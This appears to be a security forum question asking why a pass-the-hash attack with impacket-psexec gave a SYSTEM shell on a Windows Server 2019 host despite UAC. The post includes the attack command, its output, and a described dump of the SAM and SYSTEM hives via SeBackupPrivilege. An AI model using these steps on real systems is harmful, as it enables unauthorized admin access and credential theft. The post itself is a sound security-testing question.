# Pass-the-hash, why do I get a shell with high integrity?

Tags: windows, windows-server, uac, pass-the-hash

I am testing the security of a Windows Server 2019 machine and have a question about remote access to the machine.

The user on the machine has the permission "SeBackupPrivilege". I can therefore dump the "Administrator" user's SAM and SYSTEM.

```
whoami /all
    ...
    SeBackupPrivilege             Back up files and directories  Disabled
    ...
```

I then used the Administrator user's NTHash with PsExec to do a pass-the-hash attack. After doing this attack I get a shell with high integrity.

```
impacket-psexec -hashes :[NTHASH_HERE] administrator@10.10.10.10

        C:\Windows\system32> whoami
            nt authority\system
```

My question is, **why do I get a shell with high integrity?** Shouldn't UAC prevent this behavior? I would expect a shell with low integrity, given these settings as well:

UAC is enabled:

```
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
        ConsentPromptBehaviorAdmin    REG_DWORD    0x5
```

LocalAccountTokenFilterPolicy is the default value:

```
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy
        ERROR: The system was unable to find the specified registry key or value.
```

FilterAdministratorToken is the default value:

```
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v FilterAdministratorToken
    ERROR: The system was unable to find the specified registry key or value.
```

To anyone who can clarify this doubt for me...thank you.

Comment: Welcome to the community. Above you stated that you have the SeBackupPrivilege but below it states "disabled", huh?

Comment: Thank you, 

but I think there's a difference between having a disabled privilege and not having the privilege at all.
Actually, I do not doubt that the permission works, since I can dump SAM and SYSTEM.